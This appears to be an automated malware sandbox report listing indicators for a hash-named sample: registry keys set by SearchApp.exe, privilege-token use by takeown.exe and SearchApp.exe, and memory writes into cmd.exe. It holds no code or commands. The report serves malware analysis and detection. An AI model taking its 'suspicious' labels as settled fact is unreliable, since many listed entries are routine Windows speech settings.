Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "407"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Zira - English (United States)"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\tn1036.bin"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - French (France)"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR fr-FR Lookup Lexicon"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "410"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\tn1040.bin"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "0"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "6;18;22"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - German (Germany)"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\r3082sr.lxa"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\es-ES\\M3082Pablo"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\r1041sr.lxa"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\AudioInput\\TokenEnums\\MMAudioIn\\"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "French Phone Converter"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "DebugPlugin"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lts Lexicon"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\ja-JP\\M1041Ichiro"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "English Phone Converter"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Spanish Phone Converter"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR en-US Lookup Lexicon"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5223743"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Cosimo - Italian (Italy)"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{C6FABB24-E332-46FB-BC91-FF331B2D51F0}"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "404"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Has seleccionado %1 como voz predeterminada."	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\L1036"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\r1040sr.lxa"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "I 0069 Y 0079 IX 0268 YX 0289 UU 026F U 0075 IH 026A YH 028F UH 028A E 0065 EU 00F8 EX 0258 OX 0275 OU 0264 O 006F AX 0259 EH 025B OE 0153 ER 025C UR 025E AH 028C AO 0254 AE 00E6 AEX 0250 A 0061 AOE 0276 AA 0251 Q 0252 EI 006503610069 AU 00610361028A OI 025403610069 AI 006103610069 IYX 006903610259 UYX 007903610259 EHX 025B03610259 UWX 007503610259 OWX 006F03610259 AOX 025403610259 EN 00650303 AN 00610303 ON 006F0303 OEN 01530303 P 0070 B 0062 M 006D BB 0299 PH 0278 BH 03B2 MF 0271 F 0066 V 0076 VA 028B TH 03B8 DH 00F0 T 0074 D 0064 N 006E RR 0072 DX 027E S 0073 Z 007A LSH 026C LH 026E RA 0279 L 006C SH 0283 ZH 0292 TR 0288 DR 0256 NR 0273 DXR 027D SR 0282 ZR 0290 R 027B LR 026D CT 0063 JD 025F NJ 0272 C 00E7 CJ 029D J 006A LJ 028E W 0077 K 006B G 0067 NG 014B X 0078 GH 0263 GA 0270 GL 029F QT 0071 QD 0262 QN 0274 QQ 0280 QH 03C7 RH 0281 HH 0127 HG 0295 GT 0294 H 0068 WJ 0265 PF 007003610066 TS 007403610073 CH 007403610283 JH 006403610292 JJ 006A0361006A DZ 00640361007A CC 007403610255 JC 006403610291 TSR 007403610282 WH 028D ESH 029C EZH 02A2 ET 02A1 SC 0255 ZC 0291 LT 027A SHX 0267 HZ 0266 PCK 0298 TCK 01C0 NCK 0021 CCK 01C2 LCK 01C1 BIM 0253 DIM 0257 QIM 029B GIM 0260 JIM 0284 S1 02C8 S2 02CC . 002E _\| 007C _\|\| 2016 lng 02D0 hlg 02D1 xsh 02D8 _^ 203F _! 0001 _& 0002 _, 0003 _s 0004 _. 2198 _? 2197 T5 030B T4 0301 T3 0304 T2 0300 T1 030F T- 2193 T+ 2191 vls 030A vcd 032C bvd 0324 cvd 0330 asp 02B0 mrd 0339 lrd 031C adv 031F ret 0331 cen 0308 mcn 033D syl 0329 nsy 032F rho 02DE lla 033C lab 02B7 pal 02B2 vel 02E0 phr 02E4 vph 0334 rai 031D low 031E atr 0318 rtr 0319 den 032A api 033A lam 033B nas 0303 nsr 207F lar 02E1 nar 031A ejc 02BC + 0361 bva 02B1 G2 0261 rte 0320 vsl 0325 NCK3 0297 NCK2 01C3 LCK2 0296 TCK2 0287 JC2 02A5 CC2 02A8 LG 026B DZ2 02A3 TS2 02A6 JH2 02A4 CH2 02A7 SHC 0286 rhz 02B4 QOM 02A0 xst 0306 T= 2192 ERR 025D AXR 025A ZHJ 0293"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\MSTTSLocdeDE.dat"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_en-US.dat.prev"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Elsa"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\VoiceActivation_ja-JP.dat"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Katja"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\de-DE\\sidubm.table"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\r1036sr.lxa"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "L1041"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "0"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total\ = "0"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{15E16AEC-F2F0-4E52-B0DF-029D11E58E4B}"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\tn1033.bin"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR it-IT Locale Handler"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 2 0009 aa 000a ae 000b ah 000c ao 000d aw 000e ax 000f ay 0010 b 0011 ch 0012 d 0013 dh 0014 eh 0015 er 0016 ey 0017 f 0018 g 0019 h 001a ih 001b iy 001c jh 001d k 001e l 001f m 0020 n 0021 ng 0022 ow 0023 oy 0024 p 0025 r 0026 s 0027 sh 0028 t 0029 th 002a uh 002b uw 002c v 002d w 002e y 002f z 0030 zh 0031"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\de-DE-N\\AI041031"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\L3082"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\it-IT\\VoiceActivation_HW_it-IT.dat"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState\EdpState = "0"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "en-US"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{31350404-77AC-4471-B33A-9020A2EDA1D1}"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR it-IT Lookup Lexicon"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1041-110-WINMO-DNN"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\tn1041.bin"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\es-ES\\M3082Helena"	SearchApp.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	3216	takeown.exe
Token: SeTakeOwnershipPrivilege	3216	takeown.exe
Token: SeTakeOwnershipPrivilege	3216	takeown.exe
Token: SeTakeOwnershipPrivilege	3216	takeown.exe
Token: SeTakeOwnershipPrivilege	3216	takeown.exe
Token: SeManageVolumePrivilege	552	svchost.exe
Token: SeDebugPrivilege	4764	SearchApp.exe
Token: SeDebugPrivilege	4764	SearchApp.exe
Token: SeDebugPrivilege	4764	SearchApp.exe
Token: SeDebugPrivilege	4764	SearchApp.exe
Token: SeDebugPrivilege	4764	SearchApp.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4764	SearchApp.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4764	SearchApp.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 3868 wrote to memory of 2400	3868	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	84
PID 3868 wrote to memory of 2400	3868	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	84
PID 2400 wrote to memory of 1144	2400	cmd.exe	85
PID 2400 wrote to memory of 1144	2400	cmd.exe	85
PID 2400 wrote to memory of 2520	2400	cmd.exe	86
PID 2400 wrote to memory of 2520	2400	cmd.exe	86
PID 3868 wrote to memory of 1464	3868	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	88
PID 3868 wrote to memory of 1464	3868	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	88
PID 1464 wrote to memory of 3216	1464	cmd.exe	89
PID 1464 wrote to memory of 3216	1464	cmd.exe	89
